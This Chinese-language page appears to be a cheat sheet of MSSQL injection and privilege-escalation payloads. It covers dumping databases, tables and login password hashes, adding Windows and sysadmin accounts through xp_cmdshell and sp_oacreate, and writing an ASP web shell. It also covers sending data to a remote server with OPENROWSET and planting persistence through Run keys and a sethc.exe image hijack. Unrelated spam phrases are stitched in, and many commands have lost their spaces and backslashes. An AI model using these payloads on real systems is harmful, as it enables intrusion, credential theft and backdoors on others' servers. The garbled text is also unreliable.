上传小票赚钱的项目

菲哥哥注入语句笔记是一款sql注入工具，它可以注入一些要注意的东西，Sql注射经验，写成笔记了。

sql注入工具(菲哥哥注入语句笔记)功能介绍：

1.爆所有库名足球大小球

+union+select+name,filename,3,4,5+from+master.dbo.sysdatabases

//name数据库名filename数据库物理路径

+union+select+name,filename,3,4,5+from+master.dbo.sysdatabases+where+and+dbid=x+filename>0

//爆破数据库路径换dbid值就可以

+union+select+1,(select+name+from+master.dbo.sysdatabases+for+xml+path),3,4,5–

and0<>db_name(n)–

n改成0,1,2,3……就可以跨库

2.爆所有表名

+union+select+table_name,2,3,4,5+TABLE_CAtalog,table_schema+from+information_schema.tables–

//table_catalo保存当前数据库名称，table_name保存当前数据库中所有表

+select+name,id,crdate,4,5+from+数据库名.dbo.sysobjects+where+xtype=’u.+and+status>=0–

//name表名id表的idxtype=’u’u代表用户自定义的表crdate为数据库的创建时间ststus>=0

/+union+select+name,object_id,3,4,5+fromsys.tables–

3.爆所有字段名

+union+select+name,id,3,4,5+from+数据库名称.dbo.syscolumns+where+xtype=167+and+id=5575058–

//id是在爆破表名时候的id值syscolumns中的id和sysobjects中的id主外键关系

+union+select+name+from+syscolumns+where+charindex(‘pass’,name)>0

//查询含有“pass”的字段

+union+SELECTname,2,3,4,5FROMsyscolumnsWHEREid=(SELECTidFROMsysobjectsWHEREname=‘yixiang_bizre’)

//查询yixiang_bizre表中的所有字段

+union+select+table_name,column_name,3,4,5+from+information_schema.COLUMNS–

//table_name表名称column_name字段名

4.添加用户

1、declare@oint;

2、execmaster..sp_oacreate'Shell.Application',@oout;

3、execmaster..sp_oamethod@o,'ShellExecute',NULL,'cmd.exe','/cnetuserfuckfuck/add

5.判断是不是SQL库

andexists（select*fromsysobjects）

6.所有账户名

+union+select+(selectname+’||’+password_hashfrom+sys.sql_loginsforxmlpath),2,3,4,5+from+sys.sql_logins//

7.加SQL账户

1、--创建个登陆mssql的帐号

2、;execmaster.dbo.sp_addloginname,pass;--

3、--把创建的mssql登陆帐号提升到sysadmin

4、;execmaster.dbo.sp_addsrvrolemembername,sysadmin;--

8.启动组写入命令行和执行

EXECmaster.dbo.xp_regwrite‘HKEY_LOCAL_MACHINE’,’SOFTWAREMicrosoftWindowsCurrentVersionRun’,’help1′,’REG_SZ’,’cmd.exe/cnetusertestptlove/add’-

9.LCX语句

;execmaster..xp_cmdshell‘D:m目录lcx.exe-slave本机ip51目标内网ip3389′–

//目标机器执行

lcx.exe-listen512007

//本机执行连接本机的的2007端口就可以了

10.win200爆目录

xp_regread读取HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesW3SVCParametersVirtualRoots–

//获取WEB路径

11.恢复xp_cmdshell

;EXECmaster.dbo.sp_addextendedproc‘xp_cmdshell’,’e:inetpubwwwrootxplog70.dll’

//把xplog70.dll文件给他上传到e:inetpubwwwroot目录下了

12.open数据

insertintoOPENROWSET(‘SQLOLEDB’,‘server=ip;uid=user;pwd=123456!’,‘selectcfromcmd’)selectusernamefromtest

//把test是本地表，中username的值插入到远程cmd表中的c字段里

13.判断权限

1、+and+1=(select+IS_SRVROLEMEMBER('sysadmin'))--

2、//sa权限

3、and(selectIS_MEMBER('db_owner'))=1-- // dbo

4、and(selectIS_MEMBER('public'))=1-- //public

14.DIR目录

遍历系统的目录结构，分析结果并发现WEB虚拟目录，先创建一个临时表：

temphttp://www.XXXX.com/FullStory.asp?id=1;createtabletemp(idnvarchar(255),num1nvarchar(255),num2nvarchar(255),num3nvarchar(255));

–接下来：我们可以利用xp_availablemedia来获得当前所有驱动器,并存入temp表中：http://www.XXXX.com/FullStory.asp?id=1;inserttempexecmaster.dbo.xp_availablemedia;–?我们可以通过查询temp的内容来获得驱动器列表及相关信息或者利用xp_subdirs获得子目录列表,并存入temp表中：http://www.XXXX.com/FullStory.asp?id=1;insertintotemp(id)execmaster.dbo.xp_subdirs‘c:’;–?

我们还可以利用xp_dirtree获得所有子目录的目录树结构,并寸入temp表中：http://www.XXXX.com/FullStory.asp?id=1;insertintotemp(id,num1)execmaster.dbo.xp_dirtree‘c:’;–

这样就可以成功的浏览到所有的目录（文件夹）列表?如果我们需要查看某个文件的内容，可以通过执行xp_cmdsell：;insertintotemp(id)execmaster.dbo.xp_cmdshell‘typec:webindex.asp’;–?

使用’bulkinsert’语法可以将一个文本文件插入到一个临时表中。

如：bulkinserttemp(id)from‘c:inetpubwwwrootindex.asp’浏览temp就可以看到index.asp文件的内容了！通过分析各种ASP文件，可以得到大量系统信息，WEB建设与管理信息，甚至可以得到SA帐号的连接密码。

15.判断站库分离

+and+host_name()==@@servername-- //判断站库是否分离

16.存储总结

xp_availablemedia显示系统上可用的盘符’C:’xp_availablemedia

xp_enumgroups列出当前系统的使用群组及其说明xp_enumgroups

xp_enumdsn列出系统上已经设置好的ODBC数据源名称xp_enumdsn

xp_dirtree显示某个目录下的子目录与文件架构xp_dirtree‘C:inetpubwwwroot’

xp_getfiledetails获取某文件的相关属性xp_getfiledetails‘C:inetpubwwwroot.asp’

dbp.xp_makecab将目标计算机多个档案压缩到某个档案里所压缩的档案都可以接在参数的后面用豆号隔开

dbp.xp_makecab’C:lin.cab’,’evil’,1,’C:inetpubmdb.asp’

xp_unpackcab解压缩xp_unpackcab‘C:hackway.cab’,’C: emp’,1

xp_ntsec_enumdomains列出服务器域名xp_ntsec_enumdomains

xp_servicecontrol停止或者启动某个服务xp_servicecontrol‘stop’,’schedule’

xp_terminate_process用pid来停止某个执行中的程序xp_terminate_process123

dbo.xp_subdirs只列某个目录下的子目录dbo.xp_subdirs‘C:’

17.判断xp_cmdshell

+and+1=(select+count(*)+FROM+master.dbo.sysobjects+where+xtype+=‘X’+AND+name+=‘xp_cmdshell’)

18.判断系统为win2003

And+charindex('5.3',@@verisdn)

19.echo写shell

;execmaster.dbo.xp_cmdshell'echo^<scriptlanguage=VBScriptrunat=server^>executerequest^("^)^</script^>>c:\mu.asp'-

20.停掉服务

execmaster..xp_servicecontrol‘stop’,’schedule’

execmaster..xp_servicecontrol‘start’,’schedule’

有多少删减。另外添加几句个人经常用到的SQL注入和提权的语句

当xp_cmshell被删除或者无法使用的情况，我们不妨试试利用SP_OACreate和SP_OAMETHOD调用系统wscript.shell执行系统命令。

Declare@runshellINT

ExecSP_OACreate‘wscript.shell’,@runshellout

ExecSP_OAMeTHOD@runshell,’run’,null,’netuserlengflengf/add’

当这些都失败了，试试关闭系统沙盒模式，它在注册表的位置是

HKEY_LOCAL_MACHINESoftwareMicrosoftJet4.0EngineSandBoxMode

默认键值为2，即只在Access的模式下开启沙盒模式，对应的键值是

0—在任何所有者中禁止启用安全模式

1–为仅在允许范围内

2–必须在access模式下

3–完全开启

我们要将其设置为0就可以关闭了，通过SQL语句实现

Execmaster.dbo.xp_regwrite‘HKEY_LOCAL_MACHINE,’SoftwareMicrosoftJet4.0Engine’,’SandBoxMode’,’REG_DWORD’,0

执行关闭成功后就可以执行系统命令

select*fromOpenRowSet(‘Microsoft.Jet.OLEDB.4.0′,’;DataBase=c:windowssystem32iasias.mdb’,’selectshell(“netuserlengflengf/add”)’)

上面是提权思路。另外提下两种备份：

(1)Log备份(hta)

alertdatabase[dbname]setRECOVERYFULL–

createtablecmd(aimage)–

backuplog[dbname]todisk=’c:hta’withinit–

insertintocmd(a)values(‘[command]‘)–

backuplog[dbname]todisk=’系统启动目录hello.hta’–

droptablecmd–

(2)差异备份

backupdatabase[dbname]todisk=’c:db.bak’–

createtablecmd(cmdimage)–

insertintocmd(cmd)values(‘[command]‘)–

backupdatabase[dbname]todisk=’系统启动目录hello.hta’WITHDIFFERENTIALFORMAT–

droptablecmd–

经验告诉我，将你要执行的command转换成十六进制成功率会比较高，但是这个比较被动。

另外就是可以通过注册表添加run启动项添加用户命令，这种也是被动，要等服务器重启。

看了这个工具，觉得还缺少一个很使用的方法，那就是映像劫持，位于注册表位置：

HKEY_LOACAL_MACHINESoftwareMicrosoftWindowsNTCurrentVersionImageFileExecutionOptions

在这个键下面有一个Debugger的参数，如果不为空，就会处理。添加映像劫持方法的SQL语句如下：

execMaster.dbo.xp_regWrite‘HKEY_LOACAL_MACHINE’,’Software\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\sethc.exe’,’debugger’,’REG_SZ’,’c:windowssystem32cmd.exe’